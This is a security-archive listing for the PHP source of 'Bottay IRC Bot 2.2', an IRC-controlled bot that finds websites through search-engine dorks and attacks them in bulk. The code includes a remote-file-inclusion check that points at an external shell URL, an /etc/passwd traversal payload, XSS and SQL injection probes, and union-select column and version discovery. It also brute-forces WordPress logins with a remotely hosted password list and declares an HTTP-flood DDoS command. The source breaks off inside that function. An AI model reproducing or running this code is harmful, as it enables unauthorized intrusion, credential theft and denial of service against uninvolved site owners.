what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Bottay IRC Bot 2.2

Bottay IRC Bot 2.2
Posted Jun 30, 2011
Authored by Burtay

Bottay IRC Bot can perform s a battery of tests against a given system including, but not limited to, SQL injection, cross site scripting, Joomla/Wordpress detection, port scanning, denial of service, and more.

tags | denial of service, xss, sql injection
SHA-256 | 18bd6eb21ba923dcc2bba1cd7d4cd17791dc289e5163fed5252aeb3105cf92ed

Bottay IRC Bot 2.2

Change Mirror Download
<?php
/*
Bottay V 2.2 Versiyon
Coded By Burtay | cwburtay@hotmail.com
Burtay.Org | Cyber-Warrior.Org | Megaturks.Net | Rootarea.Com
Special Thanks RMx
--------------------------------------------------------------------------------------------------------
#Tutorial Videos
1.Bottay V.2.1 for Dummies
http://www.youtube.com/watch?v=CAYfQeM4e3g
2.Bottay Kanala Sokma (How to join channel)
http://www.youtube.com/watch?v=r6QnTcLhKbw
3.Bottay SQL injection Scan
http://www.youtube.com/watch?v=7C2DwB9g1b0
4.Bottay V.2.0 (Hedef sitede Joomlalarý belirleyip RFI taratarak servera girme)(Target Server Scan)
http://www.youtube.com/watch?v=vzPx9RDLdZg
5. Bottay V.2.0 Joomla Token Scan
http://www.youtube.com/watch?v=D3GX8b44LCs
6. Bottay V.2.0 Demonstration
http://www.youtube.com/watch?v=oPFpfiWSptA
7. Bottay V2.0 Target Server Scan (Hazýr sistem olmayan bir sitede nasýl hedefe dair açýk bulunacaðý)
http://www.youtube.com/watch?v=4BswZURkXqk
8. Bottay V2.1. MySQL Injection Dumper
http://www.youtube.com/watch?v=uvvnXB9qCNw
9. Bottay Genel Anlatým (RFI,LFI,XSS ve SQL Tarama - Wordpress Admin Panelini Brute ederek kýrma)
http://vimeo.com/12827547
10.Bottay V.2.0 DDos
http://www.youtube.com/watch?v=kjQIpE0-5V4
----------------------------------------------------------------------------------------------------------
* Bottay is a irc bot that can perform below things.
* RFI,LFI,LFD,XSS,MySQL Injection,MSSQL Injection,ORACLE Injection,Access Injection Scanner
* MySQL Colon number and Version Finder
* Admin Panel Finder
* Google and Bing Searcher
* HTTP Flood (DDos)
* ReverseIP
* Wordpress Auto Detection
* Joomla Auto Detection
* Wordpress Brute-Forcer (Auto detection for reverseIP or your list)
* Port Scanner
* Joomla Bug Scanner (RFI,LFI and Token)
* [+]YouTube Downloader -> eklendi (25.12.2010)
* [+]MySQL Injection Dumper -> eklendi (29.12.2010)
*/

error_reporting(0);
set_time_limit(0);

class IRC_BOT
{

#Admin Informations
private $password = "CodedByBurtay";
private $admin = "burtay";
private $mail = 'cwburtay@hotmail.com';
#IRC server Datas
private $server = '127.0.0.1';
private $port = 6667;
private $nick = 'Bottay';
private $kanal = '#burtay';
private $baglan;
private $ex;
private $log;
private $google_dil;
private $google_adres;
private $durum = 0;
#Bottay Datas
private $log_dosyasi = "Bottay-Log.txt";
private $alt = "\n";

#Search Engine Datas
private $google_regex = '#<h3 class="r"><a href="(.*?)"#si';
private $bing_regex = '#<h3><a href="(.*?)" onmousedown=#si';
#Reverse IP Datas
private $reverse_site = 'http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php?remoteAddress=';
private $reverse_regex = '#"(.*?)"#si';
private $reverse_dosya = 'reverse.txt';

private $shell_adresi = 'http://t00lz.t0.funpic.org/rfi.txt?';
private $rfi_regex = 'burtay';
private $xss_regex = '"><script>alert("burtay")</script>';

private $bug_log = 'bug_log.txt';
private $toplu_bug = 'toplu.txt';
private $rfi_log = 'rfi.txt';
private $lfi_log = 'lfi.txt';
private $lfd_log = 'lfd.txt';
private $xss_log = 'xss.txt';
private $mysql_log = 'mysql.txt';
private $mssql_log = 'mssql.txt';
private $access_log = 'access.txt';
private $oracle_log = 'oracle.txt';
private $blind_log = 'blind.txt';
private $wp_log = 'wp.txt';

private $lfi_shell = '../../../../../../../../../../../../../../../etc/passwd';
private $lfi_regex = 'root:x:';//Only Linux Servers
private $sql_ek = "'a";
private $sql_shell = '+and+1=0';
private $sql_shell2 = '+and+1=1';
#özgün script tamasý
private $link_regex = '#<a href="(.*?)"#si';
private $ozgun_site = 'ozgun.txt';
#Wordpress Scanner Datas
private $incele_wp = 'wp.txt';
private $wordpress_regex = array('general.php','wp-content','wp-includes');
private $basic_password = 'http://birlahealthcare.co.uk/App_Themes/blue/images/wp.txt';
private $wp_durum;
#Joomla Scanner Datas
private $joomla_regex = array('components','option=com_');
private $incele_joomla = 'joomla.txt';
private $joom_sql;
private $joom_rfi = 'http://birlahealthcare.co.uk/App_Themes/blue/images/joomla_rfi.txt';
private $token_ilk = '/?option=com_user&view=reset&layout=confirm';
private $token_son = '/?option=com_user&task=confirmreset';
private $md5_regex = '/[0-9a-f]{32}/si';
private $joom_durum;
#SQL Scanner Datas
private $kolon_sayisi = 50;
private $version;
private $max_kolon = 50;
private $versiyon_regex = array('concat(0x3C626F7476657273696F6E3E,version(),0x3C2F626F7476657273696F6E3E)','#<botversion>(.*?)</botversion>#si');
private $mysql_regex = array('MySQL','mysql_fetch_array()','Sql syntax','mysql_fetch_row()','mysql_num_rows()','ODBC SQL');
private $mssql_regex = array('MSSQL','Unclosed',"'dbo'");
private $access_regex = array('Access','JET Database','for JDBC');
private $oracle_regex = array('ORACLE','ORA-01756');
#Renkler
private $siyah = '1';
private $mavi = '2';
private $yesil = '3';
private $kirmizi = '4';
private $kahverengi = '5';
private $mor = '6';
private $turuncu = '7';
private $sari = '8';
public $google_renk;
#Youtube Downloader
private $youtube_regex = '#http://v(.*?)&id=[0-9a-f]{16}#si';
private $youtube_isim = '#<title>(.*?)</title>#si';
private $youtube_linkler = array();
#Download Datas
private $boyut_regex = '/Content-Length: (\d+)/';
private $uzanti_regex = '/Content-Type: (a-z0-9){3}/';
#MySQL Dumper Datas
private $hex_code = array('0x3c6275727461793e','0x3c2f6275727461793e');
private $dumper_regex = '#<burtay>(.*?)</burtay>#si';


public function __construct()
{
$this->google_renk = $this->mavi . "G" . $this->kirmizi . "o" . $this->sari . "o" . $this->mavi . "g" . $this->yesil . "l" . $this->kirmizi . "e " . $this->kahverengi . " " ;


//Baglan Methodunun Çaðýrarak Socket aç
$this->baglan();

//Kanala Girmek için Nick User ve Kanal Adýný Postala
$this->ilk_adim();

//Kanalda Kalmak için Gerekli Methodu Çaðýr
$this->kanalda_kal();

}


//IRC Server'a gerekli Port üzerinden socket açan Method
private function baglan()
{
$this->baglan = fsockopen($this->server,$this->port,$error_no,$error_str,10);
if($this->baglan)
{
$this->durum = 1;
}
}

//IRC Server'a baðlandýktan sonra Kanala girmek için gerekli Hamlelerin gerçekleþtiði method
private function ilk_adim()
{
$this->nick = $this->nick . rand(1,100);
//Açýlan Socket içinde Nick gönder
fputs($this->baglan,"NICK ".$this->nick . $this->alt);

//Açýlan Socket içinde User gönder
fputs($this->baglan,"USER ".$this->nick ." " . $this->server . " ". $this->server . " : " .$nick . $this->alt);

//Açýlan Socket içinde Kanala Girme komutunu gönder
fputs($this->baglan,"JOIN ".$this->kanal. $this->alt);

//Bottayýn Kanala Girdiðini Belirt
$this->yaz($this->kirmizi . "Bottay Kanala Girdi.Açýn Önümü Lan ");
$this->yaz($this->kirmizi . "Coded By ". $this->yesil . base64_decode("YnVydGF5"));
}

private function kanalda_kal()
{
//Botun Kanalda Kalmasýný Saðlayan While Döngüsü
while (! feof($this->baglan))
{
//Socketden gelen Veriler
$this->log = fgets($this->baglan,128);

//Socketden Gelen verileri dosyaya kaydedilmesi
$this->kayit($this->log_dosyasi,nl2br($this->log));

//Gelen Datayý boþluða göre parçalayan method
$this->ayir($this->log);

//
$komut = explode(":",$this->ex[3]);
$komut = trim($komut[1]);
ob_flush();
flush();
usleep(5000);
echo $this->log."<br>";

if($this->ex[0]=="PING")
{
fputs($this->baglan,"PONG ".$this->ex[1]."\n");
$this->yaz($this->kirmizi ."Bilgi:". $this->mavi . "PONG gönderildi");
echo "Bilgi:PONG Gönderildi <br>";
}

if ($komut == "!login")
{
$this->login();
}

elseif( $this->login_kontrol() and $komut == "!logout" )
{
$this->logout();
}
elseif($this->ex[1]=="KICK" and $this->ex[3] == $this->nick)
{
fputs($this->baglan,"JOIN ".$this->kanal. $this->alt);
}
elseif ($komut == "!help" and $this->login_kontrol() )
{
$this->yaz($this->mavi . "Coded By ".base64_decode("YnVydGF5"));
$this->yaz($this->mavi . "Bottay V.2.2");
$this->test();
}

elseif ($komut == "!cikis" and $this->login_kontrol() )
{
$this->yaz($this->kirmizi . "Cikis Yapilmakta");
fputs($this->baglan,"QUIT Allaha Ismarlaldýk\n");
}

###Google
elseif ($komut == "!google" and $this->login_kontrol() )
{
foreach( $this->google() as $xxx )
$this->yaz($xxx);
}

###Google
elseif ($komut == "!bing" and $this->login_kontrol() )
{

foreach( $this->bing() as $xxx )
{
$this->yaz($xxx);
}
}

###Googler Kýsa Url
elseif ($komut == "!google_kýsa" and $this->login_kontrol() )
{
foreach( $this->google() as $xxx )
{
$siteler = $this->url_kisalt($xxx);
$this->yaz($siteler);
}
}
####TEST
elseif ($komut == "!test" and $this->login_kontrol() )
{
$this->test();
}

###RFI
elseif ($komut == "!rfi" and $this->login_kontrol() )
{
$this->yaz($this->mor . "RFI Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->rfi($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->rfi($xxx);
}
$this->yaz($this->mor . "RFI Taramasi Bitti");
}
###LFI
elseif ($komut == "!lfi" and $this->login_kontrol() )
{
$this->yaz($this->mor . "LFI Taramasi Basladi");
foreach( $this->google() as $xxx )
{
$this->lfi($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->lfi($xxx);
}
$this->yaz($this->mor . "LFI Taramasi Bitti");
}

###LFD
elseif ($komut == "!lfd" and $this->login_kontrol() )
{
$this->yaz($this->mor . "LFD Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->lfd($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->lfd($xxx);
}
$this->yaz($this->mor . "LFD Taramasi Bitti");
}

###SQL
elseif ($komut == "!sql" and $this->login_kontrol() )
{
$this->yaz($this->mor . "SQL Injection Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->sql($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->sql($xxx);
}
$this->yaz($this->mor . "SQL Injection Taramasi Bitti");
}

###MySQL Versiyon
elseif ($komut == "!mysql_versiyon" and $this->login_kontrol() )
{
$this->yaz($this->mor . "MySQL Versiyon Taramasi Baþladi");
$this->versiyon_bul();
$this->yaz($this->mor . "MySQL Versiyon Taramasi Bitti");
}

###Blind SQL
elseif ($komut == "!blind_sql" and $this->login_kontrol() )
{
$this->yaz($this->mor . "Blind SQL Injection Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->blind_sql($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->blind_sql($xxx);
}
$this->yaz($this->mor . "Blind SQL Injection MySQL Taramasi Bitti");
}
###Wordpress Brute Force
elseif ($komut == "!wordpress" and $this->login_kontrol() )
{
$this->yaz($this->mor . "Wordpress Taramasi Basladi");
foreach( $this->google() as $xxx )
{
$xxx = $this->url_kisalt($xxx);
$this->wordpress($xxx);
}
$this->yaz($this->mor . "Wordpress Taramasi Bitti");
}
###ReverseIP
elseif ($komut == "!reverse" and $this->login_kontrol() )
{
$this->reverse_ip();
}
###Manuel Postalama
elseif ($komut == "!mgg" and $this->login_kontrol() )
{
$this->mgg();
}

###XSS
elseif ($komut == "!xss" and $this->login_kontrol() )
{
$this->yaz($this->mor . "XSS Taramasi Baþladi");
foreach( $this->google() as $xxx )
{
$this->xss($xxx);
}
foreach( $this->bing() as $xxx )
{
$this->xss($xxx);
}
$this->yaz($this->mor . "XSS Taramasi Bitti");
}
elseif ($komut == "!incele" and $this->login_kontrol() )
{
$this->incele();
}

#Hedef Serverdaki Sitelere Otomatik wp ataklarý
elseif ($komut == "!wp-auto" and $this->login_kontrol() )
{
$this->wordpress_oto();
}
#istenilen tek 1 siteye wp ataklarý
elseif ($komut == "!wp-brute" and $this->login_kontrol() )
{
$this->wordpress($this->ex[4]);
}
#Liste Halinde verilen siteler wp ataklarý
elseif ($komut == "!wp-brute-liste" and $this->login_kontrol() )
{
$siteler = $this->get2($this->ex[4]);
$explode("\n",$siteler);
$this->yaz($this->mavi ."Denenecek Toplam Site " . $this->yesil ." ". count($explode) );
foreach($siteler as $site)
{
$this->wordpress($site);
}
}
elseif ($komut == "!joom-auto" and $this->login_kontrol() )
{
$this->joom_auto();
}

elseif ($komut == "!joom-token" and $this->login_kontrol() )
{
$this->joom_token($this->ex[4]);
}

elseif ($komut == "!joom-token-liste" and $this->login_kontrol() )
{
$siteler = $this->get($this->ex[4]);
$this->yaz($this->ex[4]);
$explode = explode("\n",$siteler);
$this->yaz($this->mavi ."Denenecek Toplam Site " . $this->yesil ." ". count($explode) );
foreach($explode as $site)
{
$this->joom_token($site);
}
}
#Çýkarýlan Özgün Scriptler otomatik taranýr
elseif ($komut == "!ozgun" and $this->login_kontrol() )
{
$this->ozgun();
}
#DDos
elseif ($komut == "!ddos" and $this->login_kontrol() )
{
$this->DDos();
}
#Port Scanner
elseif ($komut == "!port" and $this->login_kontrol() )
{
$this->port_scanner();
}
#Youtube Video Downloader
elseif($komut == "!youtube" and $this->login_kontrol())
{
$this->youtube_isim($this->ex[4]);
}
#MySQL Injection Dumper
elseif($komut == "!dump" and $this->login_kontrol())
{
$this->dump();
}
#Login Deðil ise Hata Verir
elseif(eregi("!",$komut) and !$this->login_kontrol() )
{
$this->yaz($this->mor . "Komut Vermek için Yetkiniz Yok");
}
}
}

private function login()
{

if($_SESSION["admin"] != '')
{
$this->yaz($this->yesil."Zaten giriþ yapmýþsýnýz");
}
elseif( trim($this->ex[4]) == $this->password )
{
$_SESSION["admin"] = 'admin';
$this->yaz($this->yesil . "Basarili sekilde giris Yaptiniz Tebrikler");
}
else
{
$this->yaz($this->kirmizi . "Hatalý GiriS");
}
}

private function login_kontrol()
{

if( $_SESSION["admin"] == 'admin' )
{
return true;
}
else
{
return false;
}
}

private function logout()
{
$this->yaz($this->kirmizi . "Cikis Yapildi");
unset($_SESSION["admin"]);
}

private function yaz($bunu)
{

# $bunu deðiþkeni ile dýþardan yazdýracaðým iletiyi gönderiyorum
# Bu methodun çalýþmasý için önceden baglan() methodunun çalýþtýrýlmasý lazým
# Çünkü Socket iþlemi $this->baglan deðiþleninde
fputs($this->baglan,"PRIVMSG " . $this->kanal . " : ". $bunu . "\n" );
}

private function get($site)
{

$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_COOKIEJAR,dirname(__FILE__).'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEFILE,dirname(__FILE__).'cookie.txt');
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,5);
curl_setopt($curl,CURLOPT_URL,$site);
$calis = curl_exec($curl);
curl_close($calis);
return $calis;
}

private function get2($site)
{

return file_get_contents($site);
}

private function header_al($site)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_HEADER,1);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_NOBODY, 1);
curl_setopt($curl,CURLOPT_TIMEOUT,5);
curl_setopt($curl,CURLOPT_URL,$site);
$calis = curl_exec($curl);
curl_close($calis);
return $calis;
}

private function post($site,$post)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_TIMEOUT,5);
curl_setopt($curl,CURLOPT_URL,$site);
curl_setopt($curl,CURLOPT_COOKIEJAR,dirname(__FILE__).'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEFILE,dirname(__FILE__).'cookie.txt');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$post);
$calis = curl_exec($curl);
curl_close($calis);
return $calis;
}

private function google()
{

//$this->google_dil();

$this->google_adres = $this->ex[4];
$this->yaz($this->turuncu ."Arama Yapýlacak Google Domaini " . $this->yesil . $this->google_adres);
$this->google_dil = $this->ex[5];
$this->yaz($this->turuncu ."Arama Yapýlacak dil " . $this->yesil . $this->google_dil );
if( $this->google_dil=='multi' or $this->google_dil=='')
{
$this->google_dil='';
$this->yaz($this->turuncu ."Arama Yapýlacak dil " . $this->yesil ." Bütün diller");
}

// Kanalda Komuttan Sonra Gönderilen Ýlk Kelime
$kelime = urlencode($this->ex[6]);
// Kanalda Komuttan Sonra Gönderilen Ýkinci Kelime
$basla = $this->ex[7]-1;
// Kanalda Komuttan Sonra Gönderilen Üçüncü Kelime
$bit = $this->ex[8]-1;
// Çýkan Deðerleri array_push ile Method Dýþýna almak için array bir deðiþken tanýmlama
$sonucs = array();
// Kanaldan Gönderilen Bþalangýç ve bitiþ sayfasý için Gerekli Deðerler ile For döngüsü
for($id=$basla ; $id<=$bit ; $id++)
{
$sayfa_no = $id+1;
$this->yaz( $this->google_renk . $sayfa_no .". Sayfa Linkleri Alýnýyor");
//Gidilecek sayfa Sayýsýný 10 ile çarparak GoogleURL kýsmýna uydur
$rakam = $id*10;
//Gidilecek sayfa Ve aranacak Kelimeyi bildir
$site= $this->google_adres . "/search?q=".$kelime."&lr=lang_".$this->google_dil ."&start=".$rakam."&sa=N";
//Çýkan Sonuçlarý Regex ile al
preg_match_all($this->google_regex,$this->get($site),$sonucfonk);
//Regexden Gelen Array'ý Foreach Döngüsüne Sok
foreach($sonucfonk[1] as $yazdir)
{
//HTML tag Varsa yok et ve temizle ifadeyi
$sonuc = strip_tags($yazdir);
//amp; zýkkýmýný sil 28.12.2010 CW-Casper thanks
$sonuc = str_replace('amp;','',$sonuc);
//Bütün Deðeri Method dýþýna Taþýmak için Baþka bir deðiþkene Push et
array_push($sonucs,$sonuc);
}
}
//Array_push ile dolan veriyi dönder
//$this->yaz($google_renk . "Toplam Alýnan Link ". $this->yesil . ($bit+1)*100 );
return $sonucs;

}

private function bing()
{

$sonucs = array();
// Kanalda Komuttan Sonra Gönderilen Ýlk Kelime
$kelime = urlencode($this->ex[6]);
// Kanalda Komuttan Sonra Gönderilen Ýkinci Kelime
$basla = $this->ex[7];
// Kanalda Komuttan Sonra Gönderilen Üçüncü Kelime
$bit = $this->ex[8];
for($sayi=$basla ; $sayi<=$bit ; $sayi++)
{
$this->yaz($this->mavi . "B" . $this->turuncu . "i" . $this->mavi ."ng " . $this->kahverengi ." " . $sayi ." Sayfa Linkleri Alýnýyor");
$sayfa = $sayi*10+1;
$site = 'http://www.bing.com/search?q='.$kelime.'&filt=all&first='.$sayfa.'&FORM=PERE';
preg_match_all($this->bing_regex,$this->get($site),$bingfonk);
foreach($bingfonk[0] as $bing)
{
$duz = substr($bing,13,-14);
$duz = str_replace('amp;','',$duz);
array_push($sonucs,$duz);
}
}
return $sonucs;

}

private function test()
{

if ( ereg ( $this->rfi_regex,$this->get($this->shell_adresi) ) )
{
$this->yaz($this->yesil ."Shell Adress is Working.You can Scan RFI");
}
else
{
$this->yaz($this->kirmizi . "Shell Adress is Not Working");
}
if(ereg("123456",$this->get($this->basic_password)))
{$this->yaz($this->yesil ."Basic Passwords is Working!You can use Brute Force for Wordpress Admin Panel");}
else{$this->yaz($this->kirmizi . "Basic Passwords is NOT Working'");}
if( eregi("/components/com_flyspray/startdown.php?file=",$this->get($this->joom_rfi)) )
{$this->yaz($this->yesil ."Joomla RFI Database is Loaded.You can scan");}
else{$this->yaz($this->kirmizi . "Joomla RFI Database is Not Loaded!");}
}

private function rfi($gelen)
{

$site = $this->explode_rfi($gelen);
$this->yaz($this->mor . "RFI Testing " . $this->turuncu . $site);
if( ereg ($this->rfi_regex,$this->get( $site.$this->shell_adresi )) )
{
$this->yaz($this->kirmizi . "R". $this->mavi ."F". $this->sari ."I " .$this->yesil . $site);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("RFI ".$site);
$this->kayit($this->rfi_log,$gelen."/n");
}
}
}

private function lfi($gelen)
{

$site = $this->explode_rfi($gelen);
$this->yaz($this->mor . "LFI Testing " . $this->turuncu . $site);
if( ereg ($this->lfi_regex,$this->get( $site.$this->lfi_shell )) )
{
$this->yaz($this->kirmizi . "L". $this->mavi ."F". $this->sari ."I " .$this->yesil . $site.$this->lfi_shell ."%00");
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("LFI ".$site.$this->lfi_shell);
$this->kayit($this->lfi_log,$gelen.$this->lfi_shell ."\n");
}
}
elseif( ereg ($this->lfi_regex,$this->get( $site.$this->lfi_shell ."%00" )) )
{
$this->yaz($this->kirmizi . "L". $this->mavi ."F". $this->sari ."I " .$this->yesil . $site.$this->lfi_shell ."%00");
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("LFI ".$site.$this->lfi_shell ."%00");
$this->kayit($this->lfi_log,$gelen.$this->lfi_shell ."%00 \n");
}
}
}

private function xss($gelen)
{

$gelen = $this->explode_rfi($gelen);
$this->yaz($this->mor . "XSS Testing " . $this->turuncu . $gelen);
if( ereg ($this->rfi_regex,$this->get($gelen.$this->xss_regex) ) )
{
$this->yaz($this->kirmizi . "X" .$this->yesil . "S" . $this->kirmizi . "S " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("XSS ".$gelen);
$this->kayit($this->xss_log,$gelen ."\n");
}
}

}

private function sql($gelen)
{

$this->yaz($this->mor . "SQL Testing " . $this->turuncu . $gelen.$this->sql_ek);
$site = $this->get($gelen.$this->sql_ek );
if( eregi($this->mysql_regex[1],$site) or eregi($this->mysql_regex[2],$site) or eregi($this->mysql_regex[3],$site) or eregi($this->mysql_regex[4],$site) or eregi($this->mysql_regex[5],$site) )
{
$this->yaz($this->kirmizi . "M". $this->mavi ."y". $this->sari ."S" .$this->yesil . "Q" . $this->kirmizi . "L " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
//$this->versiyon_bul($gelen);
$this->kayit($this->mysql_log,$gelen ."\n");
$this->bug_kayit("MySQL Injection ".$gelen);
}
}
elseif( eregi($this->mssql_regex[1],$site) or eregi($this->mssql_regex[2],$site))
{
$this->yaz($this->kirmizi . "M". $this->mavi ."S". $this->sari ."S" .$this->yesil . "Q" . $this->kirmizi . "L " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("MSSQL Injection ".$gelen);
$this->kayit($this->mssql_log,$gelen ."\n");
}
}
elseif( eregi($this->access_regex[1],$site) or eregi($this->access_regex[2],$site) )
{
$this->yaz($this->kirmizi . "A". $this->mavi ."c". $this->sari ."c" .$this->yesil . "e" . $this->kirmizi . "s" . $this->kirmizi . "s " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("Access SQL Injection ".$gelen);
$this->kayit($this->access_log,$gelen ."\n");
}
}
elseif( eregi($this->oracle_regex[1],$site) )
{
$this->yaz($this->kirmizi . "O". $this->mavi ."R". $this->sari ."A" .$this->yesil . "C" . $this->kirmizi . "L" . $this->kirmizi . "E " . $this->yesil . $gelen);
if( eregi ($this->url_kisalt($gelen),file_get_contents($this->toplu_bug)) )
{
$this->yaz($this->kirmizi . " Bu Bug Daha önceden Kayýt edilmiþ" );
}
else
{
$this->bug_kayit("ORACLE SQL Injection ".$gelen);
$this->kayit($this->oracle_log,$gelen ."\n");
}
}
}

private function versiyon_bul($site)
{

if ( $site == null )
$site = $this->ex[4];
$site = trim($site) .$this->sql_shell . "+union+select+". $this->versiyon_regex[0];
$this->yaz($this->turuncu . "Kolon Sayýsý bulunuyor");
for($i=1 ; $i<=$this->max_kolon ; $i++)
{
$kaynak = $this->get($site.'--');
$title = preg_match($this->versiyon_regex[1],$kaynak,$versiyon);
if ($title)
{
$this->yaz($this->yesil . "Kolon Sayisi Bulundu : ".$this->kirmizi . ' ' . $i);
$this->yaz($this->yesil ."Versiyonu : " . $this->kirmizi . ' '. $versiyon[1] );
$this->kolon_sayisi = $i;
$this->version = $versiyon[1];
break;
}
$site = $site.','.$this->versiyon_regex[0];
}
}

private function url_kisalt($url)
{

$ayir = explode("/",$url);
return "http://".$ayir[2];
}

private function wordpress($site)
{

$this->yaz($this->mavi . "Taranan Site : ". $this->turuncu . $site);
foreach($this->basic_password() as $passwords)
{
$password = trim($passwords);
$this->yaz("Denenen Sifre ".$password);
$post ="log=admin&pwd=".$password."&testcookie=1";
if( eregi ($this->wordpress_regex[0],$this->post($site."/wp-login.php",$post) ) )
{
$this->yaz($this->yesil.$site .$this->kirmizi." adresi Wordpress taramasinda kirilmistir.Sifresi".$this->mor." ".$password);
break;
}
}
}

private function reverse_ip()
{

unlink ($this->reverse_dosya);
touch ($this->reverse_dosya);
//hedef siteyi al
$site = $this->ex[4];
//Baþladiðýna dair mesaj ver
$this->yaz($this->mor . "ReverseIP iþlemi Baþladi");
//kaynaðý çek
$kaynak = $this->get($this->reverse_site . $site);
//toplam siteyi çek
$ayir = explode('[[',$kaynak);
$ayir = explode(', ""]]',$ayir[1]);
preg_match_all($this->reverse_regex,$ayir[0],$siteler);
foreach($siteler[1] as $sitem)
{
if (eregi ("www.",$sitem) )
{
$sitem = substr($sitem,4);
}
$kontrol = $this->get2($this->reverse_dosya);
if (! eregi ($sitem,$kontrol) and $sitem !="")
{
$this->kayit($this->reverse_dosya,trim($sitem)."\n");
}
}
$explode = explode("\n",$this->get2($this->reverse_dosya));
$toplam = count($explode) - 1;
$this->yaz($this->mor . "toplam". $this->yesil . " " . $toplam . $this->mor ." site var");
$this->yaz($this->turuncu . "siteler dosyaya kaydedildi.ayrýþtýrma iþlemi için ".$this->kirmizi ."!incele");
}

private function kayit($dosya,$gelen)
{

$ac = fopen($dosya,'ab');
fwrite($ac,$gelen);
fclose($ac);
}

#MySQL Dumper Ýle Eklendi Kontol et sonra
private function kaydet($url,$data)
{
$site = $this->parse($url);
$ac = fopen($site.'.txt','ab');
fwrite($ac,$data."\n");
fclose($ac);
}

#MySQL Dumper Ýle Eklendi Kontol et sonra
private function parse($url)
{
$site = parse_url($url);
$site = $site["host"];
return $site;
}

private function basic_password()
{

$sifre_al = file_get_contents($this->basic_password);
$sifreler = explode("\n",$sifre_al);
return $sifreler;
}

private function explode_rfi($gelen)
{

$gelen = explode("=",$gelen);
$site = $gelen[0]."=";
return $site;
}

private function ayir($gelen)
{

$this->ex = explode(' ',$gelen);
}

## 22.06.2011 hizlandirma calismasi sebebi ile kaynak parametresi eklendi
private function wordpress_bul($kaynak,$site)
{

if ( stristr( $kaynak,$this->wordpress_regex[1]) or stristr( $kaynak,$this->wordpress_regex[2]) )
{
$this->yaz($this->yesil . " Wordpress Bulundu.Kayýt Ediliyor");
$this->kayit($this->incele_wp,$site."\n");
$this->wp_durum = true;
}
else
{
$this->wp_durum = false;
}
}

private function joomla_bul($kaynak,$site)
{

if ( stristr( $kaynak,$this->joomla_regex[1]) )
{
$this->yaz($this->kirmizi . " Joomla Bulundu.Kayýt Ediliyor");
$this->kayit($this->incele_joomla,$site."\n");
$this->joom_durum = true;
}
else
{
$this->joom_durum = false;
}
}

private function incele()
{

unlink ($this->incele_wp);
unlink ($this->incele_joomla);
unlink ($this->ozgun_site);
$this->yaz($this->kirmizi . "inceleme iþlemi Baþladi");
$kaynak = file_get_contents($this->reverse_dosya);
$ayir = explode("\n",$kaynak);
foreach($ayir as $ayrik)
{
$site = trim($ayrik);
if (! empty($site))
{
$this->yaz("incelenen site : ".$site);
//22.06.2011 Hizlandirma calismasý start
#Bu þekilde bir kez kaynak alýndýgindan dolayi 3 kat daha hizli olacaktir
$inc_kaynak = $this->get($site);
$this->wordpress_bul($inc_kaynak,$site); //Old Version $this->wordpress_bul($site);
$this->joomla_bul($inc_kaynak,$site); //Old Version $this->joomla_bul($site);
//22.06.2011 Hizlandirma calismasi end
if( $this->wp_durum == false and $this->joom_durum == false)
{
$this->yaz($this->mavi . "Özgün Script Taramasi Baþladi");
$this->yaz($this->turuncu . $site . $this->mavi . " Linkleri alýnýyor");
$this->ozgun_site($inc_kaynak,$site);
}
}
}
$this->yaz($this->kirmizi . "inceleme iþlemi sona erdi");
}

private function wordpress_oto ()
{
$this->yaz($this->kirmizi . " Hedef Servera için bütün wordpressler taranýyor lütfen bekleyiniz");
$kaynak = file_get_contents($this->incele_wp);
$ayir = explode("\n",$kaynak);
foreach($ayir as $ayrik)
{

$site = trim($ayrik);
if(! empty ($site) )
{
$this->wordpress($site);
}
}
$this->yaz($this->kirmizi . "Wordpress Taramasi Sona erdi");
}

#Header Flood V.2.0
#Örnek komut -> !ddos www.burtay.org index.php 100
private function DDos()
{
